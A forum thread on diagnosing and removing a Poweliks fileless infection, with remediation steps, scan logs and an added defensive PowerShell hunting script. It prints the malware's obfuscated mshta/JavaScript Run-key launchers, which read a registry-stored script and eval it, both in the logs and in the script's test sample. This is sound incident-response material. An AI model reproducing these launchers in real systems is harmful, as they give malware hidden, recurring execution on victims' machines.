
How I stopped the nameless one

7 replies to this topic

#1 catchineddies


  • Members
  • 8 posts
  • Local time:11:09 AM

Posted 12 June 2015 - 11:44 AM


I am not a specialist in malware removal but have done my fair share.  Therefore, my methods are my own and I do not recommend anyone following the procedures I outline below unless they are very comfortable with what they are doing.




I searched and searched for someone experiencing a similar problem but found only one hit, without fruit. The rest resulted in mshta.exe infections from long ago; this was not that. I run a small MSP business and use both Webroot and Malwarebytes Pro on all systems. Two computers from different locations recently reported infected files (some .TMP, some .DLL). They were always classified by Webroot as General Malware or Dropper. They came back each day even after being removed successfully. The computer would appear fine otherwise. But a few things on close inspection...


Running CMD netstat -aon showed dozens of HTTP/S connections to outside IPs. The PIDs would show Explorer and SVCHOST processes doing the activity. Using prefetch_info.exe to look in the Windows\Prefetch directory at DLLHOST and CONHOST I could tell something was amiss because they were called by files in the user profile temp directories. But everything that accessed them from temp locations had already disappeared. Short-lived worker files?


I ran CleanUp, ccleaner, TDSKiller, FRST, HiJackThis, GMER, Malwarebytes and Webroot full scans.  Everything came up clean with two exceptions. 


FRST and HiJackThis showed the following cryptic results in the registry (example from HJT)

O4 - HKLM\..\Run: [] mshta javascript:A7PaxDw3I="Hg";zN1=new%20ActiveXObject("WScript.Shell");yKooQAt97="NxS3";Nmtb8=zN1.RegRead("HKLM\\software\\Wow6432Node\\e6e3af07\\90869640");rgKgX95wG="fFRtUZi";eval(Nmtb8);z9Z6dGQm="R1ZyA";
O4 - HKCU\..\Run: [] mshta javascript:RKaMnJIw7="s6LoM2y8St";W92C=new%20ActiveXObject("WScript.Shell");Wt1gbqYXH="Ykn7GLvZI";Ep5N9e=W92C.RegRead("HKCU\\software\\e6e3af07\\90869640");xKSe33Bcb="TO234";eval(Ep5N9e);u65WRSeqD="X45EQXl";
O4 - HKLM\..\Policies\Explorer\Run: [] mshta javascript:fSrOm7wU="sf71";V7d=new%20ActiveXObject("WScript.Shell");uvc4Tlw="Sdu23cbO";TZ1aP=V7d.RegRead("HKLM\\software\\Wow6432Node\\e6e3af07\\90869640");UKRxcbx97W="oak";eval(TZ1aP);UQp3LpOAh="A";

RegEdit gave me an error trying to access any of the Run keys shown above because they contain invalid characters. When looking at the keys, they looked normal. Through LogMeIn I could search the registry and see the "default" key had the values presented, but I could not rename or delete them. Also, looking further in the string you can see the e6e3af07 keys, which I could find. If I deleted them, they came back immediately. This is where it got fun! Roll up your sleeves and get ready for battle!


I brought up SysInternals Process Monitor (procmon) and filtered by Operation 'RegCreateKey'. Deleted the e6e3af07 key in the registry and looked for the process that brought it back. Start SysInternals Process Explorer, find the process in question and SUSPEND it. We aren't out of the woods yet! These guys work in packs! Double-click on the suspended process and look to see what spawned it (Parent). In some cases the process no longer exists; it will tell you there. If it still exists, go and suspend that one and repeat until the trail ends (I had svchost, explorer, and msiexec on one machine). All these processes also had a reference to counters.dat in the user's profile, which you could see in Process Explorer (View > Show Lower Pane), so you can do a spot check if you wish. Then repeat deleting the e6e3af07 registry key. If it reappears, find it in Procmon and suspend it in Process Explorer. Once it stays gone we have it stapled to the wall. Keep Process Explorer running. We rest, for only a moment, in the eddie.


Now to keep it from returning...


I struggled for a while trying to figure out why HJT couldn't delete the keys and I couldn't see them. In fact HJT had more results in HKLM\..\Run than I could see. This is where I learned about virtualization in the registry. A cloaking device! (for backward compatibility, I think..) Opening a CMD prompt I typed..

reg flags HKLM\Software\Microsoft\Windows\CurrentVersion\Run set DONT_VIRTUALIZE /s

and if it is a 64-bit machine..

reg flags HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run set DONT_VIRTUALIZE /s


I still got the error when clicking on the Run key, but I could see everything that was legitimate. How I chose to approach this was to export the Run key, delete it, then import the key. Because the cryptic key used invalid characters and was not visible, it wasn't exported; the imported key was clean. I repeated this process for all the Run locations (including Explorer!). Reran HJT to make sure all of them were gone. Lastly, I returned to Process Explorer and KILLED the suspended processes. Ran CleanUp and CCleaner to make sure temp folders were empty.


Now the big question is.. what did I encounter?! It seems to me that the registry keys created the infected file using the information in the value. How is it that an invalid character in a registry value can cause so many problems, not be detected by AV, but still function properly? Has anyone else run into this and know if I am missing anything?


Thanks for listening,



Since this is my first post I am not familiar with how to add pictures or I would have.  I just wanted to get the story out there.

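Added example, not part of the original post or of any tool the thread names: a hunting script for the two tells described above, a Run value whose name the Registry Editor cannot display, and a "mshta javascript:" command line that pulls its real script out of another key with RegRead() and eval()s it. It reads the registry through the .NET RegistryKey API rather than Get-ItemProperty, and follows the RegRead() path to show the stored payload. My assumptions: it runs on Windows from an elevated PowerShell; the RegRead() regex is written for the form quoted in the HJT lines above; and a leading NUL in a value name typically surfaces through the .NET wrapper as an empty name (which is also how HJT printed it as "[]"), so empty names are flagged too.

```powershell
# Added example (not from the post): hunt autostart keys for hidden-name values
# and mshta/RegRead/eval launchers, then fetch the script the launcher reads.
# Assumptions: Windows, elevated PowerShell 5.1 or pwsh; regex matches the
# RegRead("HKxx\\key\\value") form quoted in the thread.

Set-StrictMode -Version 2

# Autostart keys named in the thread, plus the HKCU policy Run key.
$RunKeys = @(
    @{ Hive = 'HKLM'; Path = 'Software\Microsoft\Windows\CurrentVersion\Run' },
    @{ Hive = 'HKLM'; Path = 'Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run' },
    @{ Hive = 'HKLM'; Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' },
    @{ Hive = 'HKCU'; Path = 'Software\Microsoft\Windows\CurrentVersion\Run' },
    @{ Hive = 'HKCU'; Path = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' }
)

function Get-HiveKey([string]$Hive) {
    switch ($Hive) {
        { $_ -in 'HKLM', 'HKEY_LOCAL_MACHINE' } { return [Microsoft.Win32.Registry]::LocalMachine }
        { $_ -in 'HKCU', 'HKEY_CURRENT_USER' }  { return [Microsoft.Win32.Registry]::CurrentUser }
        default { throw "Unsupported hive: $Hive" }
    }
}

# A value name regedit cannot show: empty (assumed to be how a leading NUL
# surfaces through .NET) or containing control characters.
function Test-HiddenValueName([string]$Name) {
    return ($Name.Length -eq 0) -or ($Name -match '[\x00-\x1F]')
}

# Parse the RegRead("...") argument out of a javascript: command line into
# hive, subkey and value name. WScript.Shell RegRead semantics: a trailing
# backslash means the key's default value, otherwise the last part is a value.
function Get-RegReadTarget([string]$CommandLine) {
    if (-not ($CommandLine -match 'RegRead\("([^"]+)"\)')) { return $null }
    $raw = $Matches[1] -replace '\\\\', '\'        # undo JavaScript string escaping
    $hive, $rest = $raw -split '\\', 2
    if (-not $rest) { return $null }
    if ($rest.EndsWith('\')) {
        return @{ Hive = $hive; SubKey = $rest.TrimEnd('\'); ValueName = '' }
    }
    $i = $rest.LastIndexOf('\')
    if ($i -lt 0) { return @{ Hive = $hive; SubKey = ''; ValueName = $rest } }
    return @{ Hive = $hive; SubKey = $rest.Substring(0, $i); ValueName = $rest.Substring($i + 1) }
}

function Find-SuspiciousRunEntries {
    foreach ($loc in $RunKeys) {
        $key = (Get-HiveKey $loc.Hive).OpenSubKey($loc.Path)
        if ($null -eq $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $data      = [string]$key.GetValue($name)
            $hidden    = Test-HiddenValueName $name
            $scriptish = [bool]($data -match '(?i)\bmshta\b.*(javascript|vbscript):|RegRead\(|\beval\(')
            if (-not ($hidden -or $scriptish)) { continue }

            $finding = [pscustomobject]@{
                Location    = '{0}\{1}' -f $loc.Hive, $loc.Path
                ValueName   = ($name -replace '[\x00-\x1F]', '?')   # printable form
                HiddenName  = $hidden
                ScriptHost  = $scriptish
                CommandLine = $data
                PayloadKey  = $null
                Payload     = $null
            }
            $target = Get-RegReadTarget $data
            if ($target) {
                # Follow the RegRead() to the value holding the script that gets eval'd.
                $finding.PayloadKey = '{0}\{1}\{2}' -f $target.Hive, $target.SubKey, $target.ValueName
                $pk = (Get-HiveKey $target.Hive).OpenSubKey($target.SubKey)
                if ($pk) { $finding.Payload = [string]$pk.GetValue($target.ValueName); $pk.Close() }
            }
            $finding
        }
        $key.Close()
    }
}

# Offline check of the parser against the HKLM line quoted from HJT above
# (sample input copied from the post; no registry access needed).
$sample = 'mshta javascript:A7PaxDw3I="Hg";zN1=new%20ActiveXObject("WScript.Shell");Nmtb8=zN1.RegRead("HKLM\\software\\Wow6432Node\\e6e3af07\\90869640");eval(Nmtb8);'
Get-RegReadTarget $sample | Format-Table -AutoSize

if ([Environment]::OSVersion.Platform -eq 'Win32NT') {
    $hits = @(Find-SuspiciousRunEntries)
    if ($hits.Count -eq 0) { 'No hidden-name or script-host Run entries found.' } else { $hits | Format-List }
}
```

The script only reports; it does not try to delete. A value whose real name carries an embedded NUL cannot be removed by name through the ordinary API (RegDeleteValue takes a NUL-terminated string), which is why the export / delete key / re-import approach in the post worked where regedit and HJT failed; Sysinternals RegDelNull handles the same trick for key names. The process-suspension step from the post is not scripted here either: suspend the parent chain in Process Explorer first, or the payload key will simply be re-created.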


#2 Sintharius


    Bleepin' Sniper

  • Members
  • 5,639 posts
  • Gender:Female
  • Location:The Netherlands
  • Local time:05:09 PM

Posted 12 June 2015 - 11:50 AM

Hello there,

HijackThis is outdated and not suitable for malware removal any longer, so we have stopped using it and moved on to other tools.

Registry virtualization is only a technique introduced by Microsoft to reduce registry bloating, and thus eliminate the need for registry cleaners. Those are not recommended here on BC.

In your case it looks like you have a Poweliks infection. Please run this.

Step 1
Please download Powelikscleaner (by ESET) and save it to your Desktop.
  • Double-click ESETPoweliksCleaner.exe to start the tool.
  • Read the terms of the End-user license agreement and click Agree if you agree to them.
  • The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
  • If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
  • The tool will produce a log in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

#3 catchineddies

  • Topic Starter

  • Members
  • 8 posts
  • Local time:11:09 AM

Posted 12 June 2015 - 12:12 PM

Wow, you nailed it. I ran it on one system which came up positive, the other negative (but I had more thoroughly cleaned it). So I searched for what you called it and it didn't seem to match, then I saw this article..




Looks like what I ran into for sure.


Thanks for your help!

#4 Sintharius


    Bleepin' Sniper

  • Members
  • 5,639 posts
  • Gender:Female
  • Location:The Netherlands
  • Local time:05:09 PM

Posted 12 June 2015 - 12:47 PM

Hello there,

Poweliks is by nature a Trojan Downloader - which means it is used to infiltrate a machine and downloads other malware once it has gotten a foothold on the system.

We will run additional scans to make sure that there aren't any of Poweliks' "friends" still lurking around.

Emsisoft Emergency Kit

Please download Emsisoft Emergency Kit and save it to your desktop. Double-click on the EmsisoftEmergencyKit file you downloaded to extract its contents and create a shortcut on the desktop. Leave all settings as they are and click the Extract button at the bottom. A folder named EEK will be created in the root of the drive (usually c:\).
  • After extraction please double-click on the new Start Emsisoft Emergency Kit icon on your desktop.
  • The first time you launch it, Emsisoft Emergency Kit will recommend that you allow it to download updates. Please click Yes so that it downloads the latest database updates.
  • When the update process is complete, a new button will appear in the lower-left corner that says Back. Click on this button to return to the Overview screen.
  • Click on Scan to be taken to the scan options. If you are asked if you want the scanner to scan for Potentially Unwanted Programs, then click Yes.
  • Click on the Full Scan button to start the scan.
  • When the scan is completed click the Quarantine selected objects button. Note, this option is only available if malicious objects were detected during the scan.
  • When the threats have been quarantined, click the View report button in the lower-right corner, and the scan log will be opened in Notepad.
  • Please save the log in Notepad on your desktop, and attach it to your next reply.
  • When you close Emsisoft Emergency Kit, it will give you an option to sign up for a newsletter. This is optional, and is not necessary for the malware removal process.

Malwarebytes Anti-Malware

Download Malwarebytes Anti-Malware from here.

Double-click on the file mbam-setup-2.x.x.xxxx.exe to install the application. (x.x.xxxx is the version)
  • Follow the prompt. At the end place a checkmark in Launch Malwarebytes Anti-Malware, then choose Finish.
  • When MBAM opens it will say Your database is out of date. Choose Fix Now.
  • Click on the Scan tab at the top of the window, choose Threat Scan, then Scan Now.
  • If you receive a message that updates are available, choose Update Now button (the scan will start after updates are completed).
  • Please be patient as the scan will take some time.
  • If MBAM detected threats, choose Quarantine for all items, then click Apply Actions.
  • While still on the Scan tab, choose View detailed log. In the window that opens, click the Export button, choose Text file (*.txt) and save the log to your Desktop.
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately.


#5 catchineddies

  • Topic Starter

  • Members
  • 8 posts
  • Local time:11:09 AM

Posted 12 June 2015 - 03:09 PM

MBAMv1 is already installed on the system but won't detect it, probably because it lacks the MBAR components.  Will MBAMv2 conflict?  I can't uninstall MBAMv1 as it is a part of the service kit provided, not a standalone product.


As for Emsisoft..


Emsisoft Emergency Kit - Version 9.0
Last update: 6/12/2015 2:22:11 PM
User account:

Scan settings:

Scan type: Full Scan
Objects: Rootkits, Memory, Traces, C:\, D:\, Q:\

Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Advanced caching: On
Direct disk access: Off

Scan start: 6/12/2015 2:22:33 PM
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{34AD1EA7-8B9E-4D8B-B3ED-365D12C8EE73}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{3BA6794F-1E38-4460-949A-0DE97D8EF5C2}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{5684EAE9-72EB-4CA6-83B8-82434B7E955C}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{6605E3BD-7BC3-479C-BF0A-E5D5E954EA52}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{66D59105-FE06-43A4-B292-EB0097E9EB74}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{9103C314-C4E2-4463-8934-B19BCB46236D}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{93F0AC70-20D8-4AE8-A02F-6812EFFB6B58}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{94E98D20-156E-4C53-BD7F-972C96E680B2}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{192F487E-E812-40C0-B0DE-CB4BFA20F37B}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{79332472-47F3-4E32-B07F-CF8DF4C58499}  detected: Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{BC153A3C-0BB7-4EED-83AE-28E6E398F56E}  detected: Application.AdTool (A)
Key: HKEY_USERS\S-1-5-21-2822584677-3767598069-2626080132-1001\SOFTWARE\APPDATALOW\SOFTWARE\VIDEODOWNLOADCONVERTER_4Z  detected: Application.AdTool (A)
Key: HKEY_USERS\S-1-5-21-343818398-813497703-1801674531-500\SOFTWARE\APPDATALOW\SOFTWARE\VIDEODOWNLOADCONVERTER_4Z  detected: Application.AdTool (A)
C:\Users\station5.BSC-DOM\AppData\Local\iac  detected: Application.AppInstall (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{68B8DCDB-EFA4-420A-BB8A-71B9892A2063}  detected: Adware.Win32.Drospa (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{A5F6C90C-ABE4-4C57-A421-8C5A202AA9F8}  detected: Adware.Win32.Drospa (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{B13281CF-8778-4C98-AE23-ABBA4637A33D}  detected: Adware.Win32.Drospa (A)

Scanned 179598
Found 27

Scan end: 6/12/2015 3:00:09 PM
Scan time: 0:37:36

Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{B13281CF-8778-4C98-AE23-ABBA4637A33D} Quarantined Adware.Win32.Drospa (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{A5F6C90C-ABE4-4C57-A421-8C5A202AA9F8} Quarantined Adware.Win32.Drospa (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{68B8DCDB-EFA4-420A-BB8A-71B9892A2063} Quarantined Adware.Win32.Drospa (A)
C:\Users\station5.BSC-DOM\AppData\Local\iac Quarantined Application.AppInstall (A)
Key: HKEY_USERS\S-1-5-21-343818398-813497703-1801674531-500\SOFTWARE\APPDATALOW\SOFTWARE\VIDEODOWNLOADCONVERTER_4Z Quarantined Application.AdTool (A)
Key: HKEY_USERS\S-1-5-21-2822584677-3767598069-2626080132-1001\SOFTWARE\APPDATALOW\SOFTWARE\VIDEODOWNLOADCONVERTER_4Z Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{BC153A3C-0BB7-4EED-83AE-28E6E398F56E} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{79332472-47F3-4E32-B07F-CF8DF4C58499} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{192F487E-E812-40C0-B0DE-CB4BFA20F37B} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{94E98D20-156E-4C53-BD7F-972C96E680B2} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{93F0AC70-20D8-4AE8-A02F-6812EFFB6B58} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{9103C314-C4E2-4463-8934-B19BCB46236D} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{66D59105-FE06-43A4-B292-EB0097E9EB74} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{6605E3BD-7BC3-479C-BF0A-E5D5E954EA52} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{5684EAE9-72EB-4CA6-83B8-82434B7E955C} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{3BA6794F-1E38-4460-949A-0DE97D8EF5C2} Quarantined Application.AdTool (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{34AD1EA7-8B9E-4D8B-B3ED-365D12C8EE73} Quarantined Application.AdTool (A)

Quarantined 27

#6 Sintharius


    Bleepin' Sniper

  • Members
  • 5,639 posts
  • Gender:Female
  • Location:The Netherlands
  • Local time:05:09 PM

Posted 12 June 2015 - 04:25 PM

Hi there,

If there is already MBAM on the system then skip the second one.

ESET Online Scanner
  • Click here to download the installer for ESET Online Scanner and save it to your Desktop.
  • Disable all your antivirus and antimalware software - see how to do that here.
  • Right click on esetsmartinstaller_enu.exe and select Run as Administrator.
  • Place a checkmark in YES, I accept the Terms of Use, then click Start. Wait for ESET Online Scanner to load its components.
  • Select Enable detection of potentially unwanted applications.
  • Click Advanced Settings, then place a checkmark in the following:
    • Remove found threats
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Click Start to begin scanning.
  • ESET Online Scanner will start downloading signatures and scan. Please be patient, as this scan can take quite some time.
  • When the scan is done, click List threats (only available if ESET Online Scanner found something).
  • Click Export, then save the file to your desktop.
  • Click Back, then Finish to exit ESET Online Scanner.

#7 thismeanswar


  • Members
  • 1 posts
  • Local time:08:09 AM

Posted 06 November 2015 - 12:52 AM

Hi there. I found this by searching for "mshta javascript wscript.shell virus", which is the only non-randomized string in the only evidence of virus infection I could find.


I too was on my 3rd virus scanner when I decided there must be a smarter way. Ran the Powelikscleaner executable and it did find the virus in question. Rebooting and running again verified that this tool actually did work! Where my previous hunting for keys that were there, but at the same time were not there, seemed to be going in circles and I was doubting that there was an infection still.


I then ran the second tool, after uninstalling Avira, Sophos, Malwarebytes, which all failed to detect it. Sophos is pretty bad because it was installed far before the infection and is updated over the corporate network hourly.


Sophos found the initial infection earlier in the week, into ProgramData I think, caused by a DOC file the user thinks, but could not stop it cold as this purpose-built eradicator tool did.


HijackThis, Malwarebytes, and Avira have been able to stop almost anything I have seen before this. HijackThis did find the only initial symptom of the virus; I am just disappointed in the other tools.


Emsisoft found 0 results after. So maybe Sophos did block all the things it tried to download. Oh well, too bad so sad! Now to convince the users to run limited user accounts! An even more difficult battle!




Thanks a bunch. Keep on fighting the good fight! It would be impossible to keep up without people like you guys!




#8 Sintharius


    Bleepin' Sniper

  • Members
  • 5,639 posts
  • Gender:Female
  • Location:The Netherlands
  • Local time:05:09 PM

Posted 06 November 2015 - 02:13 AM

Glad to know we could help. :)

On a side note, HijackThis is outdated and not suitable for malware removal any longer as it cannot show files properly on x64 systems.
